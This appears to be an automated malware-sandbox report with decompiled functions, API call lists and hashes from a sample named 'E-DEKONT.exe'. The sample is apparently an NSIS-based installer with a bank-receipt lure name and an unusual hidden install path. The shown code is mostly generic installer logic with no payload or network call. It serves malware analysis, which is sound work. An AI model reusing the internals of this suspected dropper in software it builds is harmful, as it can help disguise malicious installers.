                                                                            				int _t14;
                                                                            
                                                                            				_t5 = SetFileAttributesW(E00402C37(0xfffffff0),  *(_t11 - 0x24)); // executed
                                                                            				_t14 = _t5;
                                                                            				if(_t14 == 0) {
                                                                            					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
                                                                            				return 0;
                                                                            			}







                                                                            APIs
                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0040424C(int _a4) {
                                                                            				long _t2;
                                                                            
                                                                            				_t2 = SendMessageW( *0x434ee8, 0x28, _a4, 1); // executed
                                                                            				return _t2;
                                                                            			}





                                                                            APIs
                                                                            • SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0040332B(long _a4) {
                                                                            				long _t2;
                                                                            
                                                                            				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                            				return _t2;
                                                                            			}




                                                                            0x00403339
                                                                            0x0040333f

                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403339
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 78%
                                                                            			E00401F00() {
                                                                            				void* _t9;
                                                                            				intOrPtr _t13;
                                                                            				void* _t15;
                                                                            				void* _t17;
                                                                            				void* _t20;
                                                                            				void* _t22;
                                                                            
                                                                            				_t19 = E00402C37(_t15);
                                                                            				E004052E6(0xffffffeb, _t7);
                                                                            				_t9 = E00405867(_t19); // executed
                                                                            				_t20 = _t9;
                                                                            				if(_t20 == _t15) {
                                                                            					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                            				} else {
                                                                            					if( *((intOrPtr*)(_t22 - 0x20)) != _t15) {
                                                                            						_t13 = E0040670D(_t17, _t20);
                                                                            						if( *((intOrPtr*)(_t22 - 0x24)) < _t15) {
                                                                            							if(_t13 != _t15) {
                                                                            								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                            							}
                                                                            						} else {
                                                                            							E004061C9( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                                            						}
                                                                            					}
                                                                            					_push(_t20);
                                                                            					CloseHandle();
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
                                                                            				return 0;
                                                                            			}










                                                                            APIs
                                                                              • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,75F623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                              • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,75F623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                              • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E), ref: 00405341
                                                                              • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                              • Part of subcall function 00405867: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                                              • Part of subcall function 00405867: CloseHandle.KERNEL32(?), ref: 0040589D
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                                              • Part of subcall function 0040670D: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040671E
                                                                              • Part of subcall function 0040670D: GetExitCodeProcess.KERNEL32(?,?), ref: 00406740
                                                                              • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2972824698-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004014D7(intOrPtr __edx) {
                                                                            				long _t3;
                                                                            				void* _t7;
                                                                            				intOrPtr _t10;
                                                                            				void* _t13;
                                                                            
                                                                            				_t10 = __edx;
                                                                            				_t3 = E00402C15(_t7);
                                                                            				 *((intOrPtr*)(_t13 - 0x4c)) = _t10;
                                                                            				if(_t3 <= 1) {
                                                                            					_t3 = 1;
                                                                            				}
                                                                            				Sleep(_t3); // executed
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t13 - 4));
                                                                            				return 0;
                                                                            			}








                                                                            APIs
                                                                            • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E1000121B() {
                                                                            				void* _t3;
                                                                            
                                                                            				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
                                                                            				return _t3;
                                                                            			}




                                                                            0x10001225
                                                                            0x1000122b

                                                                            APIs
                                                                            • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.108852995308.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.108853063601.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.108853098522.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: AllocGlobal
                                                                            • String ID:
                                                                            • API String ID: 3761449716-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 95%
                                                                            			E00405425(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                            				struct HWND__* _v8;
                                                                            				long _v12;
                                                                            				struct tagRECT _v28;
                                                                            				void* _v36;
                                                                            				signed int _v40;
                                                                            				int _v44;
                                                                            				int _v48;
                                                                            				signed int _v52;
                                                                            				int _v56;
                                                                            				void* _v60;
                                                                            				void* _v68;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				struct HWND__* _t94;
                                                                            				long _t95;
                                                                            				int _t100;
                                                                            				void* _t108;
                                                                            				intOrPtr _t130;
                                                                            				struct HWND__* _t134;
                                                                            				int _t156;
                                                                            				int _t159;
                                                                            				struct HMENU__* _t164;
                                                                            				struct HWND__* _t168;
                                                                            				struct HWND__* _t169;
                                                                            				int _t171;
                                                                            				void* _t172;
                                                                            				short* _t173;
                                                                            				short* _t175;
                                                                            				int _t177;
                                                                            
                                                                            				_t169 =  *0x433ec4;
                                                                            				_t156 = 0;
                                                                            				_v8 = _t169;
                                                                            				if(_a8 != 0x110) {
                                                                            					if(_a8 == 0x405) {
                                                                            						CloseHandle(CreateThread(0, 0, E004053B9, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                                            					}
                                                                            					if(_a8 != 0x111) {
                                                                            						L17:
                                                                            						_t171 = 1;
                                                                            						if(_a8 != 0x404) {
                                                                            							L25:
                                                                            							if(_a8 != 0x7b) {
                                                                            								goto L20;
                                                                            							}
                                                                            							_t94 = _v8;
                                                                            							if(_a12 != _t94) {
                                                                            								goto L20;
                                                                            							}
                                                                            							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                            							_a8 = _t95;
                                                                            							if(_t95 <= _t156) {
                                                                            								L36:
                                                                            								return 0;
                                                                            							}
                                                                            							_t164 = CreatePopupMenu();
                                                                            							AppendMenuW(_t164, _t156, _t171, E004062A4(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                            							_t100 = _a16;
                                                                            							_t159 = _a16 >> 0x10;
                                                                            							if(_a16 == 0xffffffff) {
                                                                            								GetWindowRect(_v8,  &_v28);
                                                                            								_t100 = _v28.left;
                                                                            								_t159 = _v28.top;
                                                                            							}
                                                                            							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                                            								_v60 = _t156;
                                                                            								_v48 = 0x42d248;
                                                                            								_v44 = 0x1000;
                                                                            								_a4 = _a8;
                                                                            								do {
                                                                            									_a4 = _a4 - 1;
                                                                            									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                                            								} while (_a4 != _t156);
                                                                            								OpenClipboard(_t156);
                                                                            								EmptyClipboard();
                                                                            								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                            								_a4 = _t108;
                                                                            								_t172 = GlobalLock(_t108);
                                                                            								do {
                                                                            									_v48 = _t172;
                                                                            									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                            									 *_t173 = 0xd;
                                                                            									_t175 = _t173 + 2;
                                                                            									 *_t175 = 0xa;
                                                                            									_t172 = _t175 + 2;
                                                                            									_t156 = _t156 + 1;
                                                                            								} while (_t156 < _a8);
                                                                            								GlobalUnlock(_a4);
                                                                            								SetClipboardData(0xd, _a4);
                                                                            								CloseClipboard();
                                                                            							}
                                                                            							goto L36;
                                                                            						}
                                                                            						if( *0x433eac == _t156) {
                                                                            							ShowWindow( *0x434ee8, 8);
                                                                            							if( *0x434f8c == _t156) {
                                                                            								E004052E6( *((intOrPtr*)( *0x42c220 + 0x34)), _t156);
                                                                            							}
                                                                            							E004041F0(_t171);
                                                                            							goto L25;
                                                                            						}
                                                                            						 *0x42ba18 = 2;
                                                                            						E004041F0(0x78);
                                                                            						goto L20;
                                                                            					} else {
                                                                            						if(_a12 != 0x403) {
                                                                            							L20:
                                                                            							return E0040427E(_a8, _a12, _a16);
                                                                            						}
                                                                            						ShowWindow( *0x433eb0, _t156);
                                                                            						ShowWindow(_t169, 8);
                                                                            						E0040424C(_t169);
                                                                            						goto L17;
                                                                            					}
                                                                            				}
                                                                            				_v52 = _v52 | 0xffffffff;
                                                                            				_v40 = _v40 | 0xffffffff;
                                                                            				_t177 = 2;
                                                                            				_v60 = _t177;
                                                                            				_v56 = 0;
                                                                            				_v48 = 0;
                                                                            				_v44 = 0;
                                                                            				asm("stosd");
                                                                            				asm("stosd");
                                                                            				_t130 =  *0x434ef4;
                                                                            				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                            				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                            				 *0x433eb0 = GetDlgItem(_a4, 0x403);
                                                                            				 *0x433ea8 = GetDlgItem(_a4, 0x3ee);
                                                                            				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                            				 *0x433ec4 = _t134;
                                                                            				_v8 = _t134;
                                                                            				E0040424C( *0x433eb0);
                                                                            				 *0x433eb4 = E00404B83(4);
                                                                            				 *0x433ecc = 0;
                                                                            				GetClientRect(_v8,  &_v28);
                                                                            				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                            				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                                                            				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                                                            				if(_a8 >= 0) {
                                                                            					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                            					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                            				}
                                                                            				if(_a12 >= _t156) {
                                                                            					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                            				}
                                                                            				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                            				_push(0x1b);
                                                                            				E00404217(_a4);
                                                                            				if(( *0x434efc & 0x00000003) != 0) {
                                                                            					ShowWindow( *0x433eb0, _t156);
                                                                            					if(( *0x434efc & 0x00000002) != 0) {
                                                                            						 *0x433eb0 = _t156;
                                                                            					} else {
                                                                            						ShowWindow(_v8, 8);
                                                                            					}
                                                                            					E0040424C( *0x433ea8);
                                                                            				}
                                                                            				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                            				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                            				if(( *0x434efc & 0x00000004) != 0) {
                                                                            					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                            					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                            				}
                                                                            				goto L36;
                                                                            			}

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405483
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405492
                                                                            • GetClientRect.USER32(?,?), ref: 004054CF
                                                                            • GetSystemMetrics.USER32(00000002), ref: 004054D6
                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F7
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405508
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040551B
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405529
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040553C
                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555E
                                                                            • ShowWindow.USER32(?,00000008), ref: 00405572
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405593
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A3
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055BC
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C8
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 004054A1
                                                                              • Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004055E5
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000053B9,00000000), ref: 004055F3
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004055FA
                                                                            • ShowWindow.USER32(00000000), ref: 0040561E
                                                                            • ShowWindow.USER32(?,00000008), ref: 00405623
                                                                            • ShowWindow.USER32(00000008), ref: 0040566D
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A1
                                                                            • CreatePopupMenu.USER32 ref: 004056B2
                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C6
                                                                            • GetWindowRect.USER32(?,?), ref: 004056E6
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FF
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
                                                                            • OpenClipboard.USER32(00000000), ref: 00405747
                                                                            • EmptyClipboard.USER32 ref: 0040574D
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405763
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405797
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
                                                                            • CloseClipboard.USER32 ref: 004057A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                            • String ID: {
                                                                            • API String ID: 590372296-366298937
                                                                            • Opcode ID: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                                            • Instruction ID: 2f82927f57e7d4f45bca6e23eab998b55dded590160266c2ba262d9988700e91
                                                                            • Opcode Fuzzy Hash: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
                                                                            • Instruction Fuzzy Hash: 37B16970800608BFDB119FA0DD89AAE7B79FB48355F00403AFA45B61A0CB759E51DF68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 78%
                                                                            			E004046E6(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				long _v16;
                                                                            				long _v20;
                                                                            				long _v24;
                                                                            				char _v28;
                                                                            				intOrPtr _v32;
                                                                            				long _v36;
                                                                            				char _v40;
                                                                            				unsigned int _v44;
                                                                            				signed int _v48;
                                                                            				WCHAR* _v56;
                                                                            				intOrPtr _v60;
                                                                            				intOrPtr _v64;
                                                                            				intOrPtr _v68;
                                                                            				WCHAR* _v72;
                                                                            				void _v76;
                                                                            				struct HWND__* _v80;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				intOrPtr _t82;
                                                                            				long _t87;
                                                                            				short* _t89;
                                                                            				void* _t95;
                                                                            				signed int _t96;
                                                                            				int _t109;
                                                                            				signed short _t114;
                                                                            				signed int _t118;
                                                                            				struct HWND__** _t122;
                                                                            				intOrPtr* _t138;
                                                                            				WCHAR* _t146;
                                                                            				unsigned int _t150;
                                                                            				signed int _t152;
                                                                            				unsigned int _t156;
                                                                            				signed int _t158;
                                                                            				signed int* _t159;
                                                                            				signed int* _t160;
                                                                            				struct HWND__* _t166;
                                                                            				struct HWND__* _t167;
                                                                            				int _t169;
                                                                            				unsigned int _t197;
                                                                            
                                                                            				_t156 = __edx;
                                                                            				_t82 =  *0x42c220;
                                                                            				_v32 = _t82;
                                                                            				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x435000;
                                                                            				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                            				if(_a8 == 0x40b) {
                                                                            					E004058C8(0x3fb, _t146);
                                                                            					E00406516(_t146);
                                                                            				}
                                                                            				_t167 = _a4;
                                                                            				if(_a8 != 0x110) {
                                                                            					L8:
                                                                            					if(_a8 != 0x111) {
                                                                            						L20:
                                                                            						if(_a8 == 0x40f) {
                                                                            							L22:
                                                                            							_v8 = _v8 & 0x00000000;
                                                                            							_v12 = _v12 & 0x00000000;
                                                                            							E004058C8(0x3fb, _t146);
                                                                            							if(E00405C5B(_t186, _t146) == 0) {
                                                                            								_v8 = 1;
                                                                            							}
                                                                            							E00406282(0x42b218, _t146);
                                                                            							_t87 = E0040665C(1);
                                                                            							_v16 = _t87;
                                                                            							if(_t87 == 0) {
                                                                            								L30:
                                                                            								E00406282(0x42b218, _t146);
                                                                            								_t89 = E00405BFE(0x42b218);
                                                                            								_t158 = 0;
                                                                            								if(_t89 != 0) {
                                                                            									 *_t89 = 0;
                                                                            								}
                                                                            								if(GetDiskFreeSpaceW(0x42b218,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                            									goto L35;
                                                                            								} else {
                                                                            									_t169 = 0x400;
                                                                            									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                            									asm("cdq");
                                                                            									_v48 = _t109;
                                                                            									_v44 = _t156;
                                                                            									_v12 = 1;
                                                                            									goto L36;
                                                                            								}
                                                                            							} else {
                                                                            								_t159 = 0;
                                                                            								if(0 == 0x42b218) {
                                                                            									goto L30;
                                                                            								} else {
                                                                            									goto L26;
                                                                            								}
                                                                            								while(1) {
                                                                            									L26:
                                                                            									_t114 = _v16(0x42b218,  &_v48,  &_v28,  &_v40);
                                                                            									if(_t114 != 0) {
                                                                            										break;
                                                                            									}
                                                                            									if(_t159 != 0) {
                                                                            										 *_t159 =  *_t159 & _t114;
                                                                            									}
                                                                            									_t160 = E00405B9F(0x42b218);
                                                                            									 *_t160 =  *_t160 & 0x00000000;
                                                                            									_t159 = _t160;
                                                                            									 *_t159 = 0x5c;
                                                                            									if(_t159 != 0x42b218) {
                                                                            										continue;
                                                                            									} else {
                                                                            										goto L30;
                                                                            									}
                                                                            								}
                                                                            								_t150 = _v44;
                                                                            								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                            								_v44 = _t150 >> 0xa;
                                                                            								_v12 = 1;
                                                                            								_t158 = 0;
                                                                            								__eflags = 0;
                                                                            								L35:
                                                                            								_t169 = 0x400;
                                                                            								L36:
                                                                            								_t95 = E00404B83(5);
                                                                            								if(_v12 != _t158) {
                                                                            									_t197 = _v44;
                                                                            									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                            										_v8 = 2;
                                                                            									}
                                                                            								}
                                                                            								if( *((intOrPtr*)( *0x433ebc + 0x10)) != _t158) {
                                                                            									E00404B6B(0x3ff, 0xfffffffb, _t95);
                                                                            									if(_v12 == _t158) {
                                                                            										SetDlgItemTextW(_a4, _t169, 0x42b208);
                                                                            									} else {
                                                                            										E00404AA2(_t169, 0xfffffffc, _v48, _v44);
                                                                            									}
                                                                            								}
                                                                            								_t96 = _v8;
                                                                            								 *0x434fa4 = _t96;
                                                                            								if(_t96 == _t158) {
                                                                            									_v8 = E0040140B(7);
                                                                            								}
                                                                            								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                            									_v8 = _t158;
                                                                            								}
                                                                            								E00404239(0 | _v8 == _t158);
                                                                            								if(_v8 == _t158 &&  *0x42d238 == _t158) {
                                                                            									E0040463F();
                                                                            								}
                                                                            								 *0x42d238 = _t158;
                                                                            								goto L53;
                                                                            							}
                                                                            						}
                                                                            						_t186 = _a8 - 0x405;
                                                                            						if(_a8 != 0x405) {
                                                                            							goto L53;
                                                                            						}
                                                                            						goto L22;
                                                                            					}
                                                                            					_t118 = _a12 & 0x0000ffff;
                                                                            					if(_t118 != 0x3fb) {
                                                                            						L12:
                                                                            						if(_t118 == 0x3e9) {
                                                                            							_t152 = 7;
                                                                            							memset( &_v76, 0, _t152 << 2);
                                                                            							_v80 = _t167;
                                                                            							_v72 = 0x42d248;
                                                                            							_v60 = E00404A3C;
                                                                            							_v56 = _t146;
                                                                            							_v68 = E004062A4(_t146, 0x42d248, _t167, 0x42ba20, _v12);
                                                                            							_t122 =  &_v80;
                                                                            							_v64 = 0x41;
                                                                            							__imp__SHBrowseForFolderW(_t122);
                                                                            							if(_t122 == 0) {
                                                                            								_a8 = 0x40f;
                                                                            							} else {
                                                                            								__imp__CoTaskMemFree(_t122);
                                                                            								E00405B53(_t146);
                                                                            								_t125 =  *((intOrPtr*)( *0x434ef4 + 0x11c));
                                                                            								if( *((intOrPtr*)( *0x434ef4 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra") {
                                                                            									E004062A4(_t146, 0x42d248, _t167, 0, _t125);
                                                                            									if(lstrcmpiW(0x432e80, 0x42d248) != 0) {
                                                                            										lstrcatW(_t146, 0x432e80);
                                                                            									}
                                                                            								}
                                                                            								 *0x42d238 =  *0x42d238 + 1;
                                                                            								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                            							}
                                                                            						}
                                                                            						goto L20;
                                                                            					}
                                                                            					if(_a12 >> 0x10 != 0x300) {
                                                                            						goto L53;
                                                                            					}
                                                                            					_a8 = 0x40f;
                                                                            					goto L12;
                                                                            				} else {
                                                                            					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                            					if(E00405BCA(_t146) != 0 && E00405BFE(_t146) == 0) {
                                                                            						E00405B53(_t146);
                                                                            					}
                                                                            					 *0x433eb8 = _t167;
                                                                            					SetWindowTextW(_t166, _t146);
                                                                            					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                            					_push(1);
                                                                            					E00404217(_t167);
                                                                            					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                            					_push(0x14);
                                                                            					E00404217(_t167);
                                                                            					E0040424C(_t166);
                                                                            					_t138 = E0040665C(7);
                                                                            					if(_t138 == 0) {
                                                                            						L53:
                                                                            						return E0040427E(_a8, _a12, _a16);
                                                                            					} else {
                                                                            						 *_t138(_t166, 1);
                                                                            						goto L8;
                                                                            					}
                                                                            				}
                                                                            			}













































                                                                            0x00404809
                                                                            0x00404810
                                                                            0x00404818
                                                                            0x00404872
                                                                            0x0040481a
                                                                            0x0040481b
                                                                            0x00404822
                                                                            0x0040482c
                                                                            0x00404834
                                                                            0x00404841
                                                                            0x00404855
                                                                            0x00404859
                                                                            0x00404859
                                                                            0x00404855
                                                                            0x0040485e
                                                                            0x0040486b
                                                                            0x0040486b
                                                                            0x00404818
                                                                            0x00000000
                                                                            0x004047d0
                                                                            0x004047be
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004047c4
                                                                            0x00000000
                                                                            0x0040472f
                                                                            0x0040473c
                                                                            0x00404745
                                                                            0x00404752
                                                                            0x00404752
                                                                            0x00404759
                                                                            0x0040475f
                                                                            0x00404768
                                                                            0x0040476b
                                                                            0x0040476e
                                                                            0x00404776
                                                                            0x00404779
                                                                            0x0040477c
                                                                            0x00404782
                                                                            0x00404789
                                                                            0x00404790
                                                                            0x00404a27
                                                                            0x00404a39
                                                                            0x00404796
                                                                            0x00404799
                                                                            0x00000000
                                                                            0x00404799
                                                                            0x00404790

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404735
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 0040475F
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404810
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 0040481B
                                                                            • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 0040484D
                                                                            • lstrcatW.KERNEL32(?,Call), ref: 00404859
                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040486B
                                                                              • Part of subcall function 004058C8: GetDlgItemTextW.USER32(?,?,00000400,004048A2), ref: 004058DB
                                                                              • Part of subcall function 00406516: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\E-DEKONT.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75F63420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                                              • Part of subcall function 00406516: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
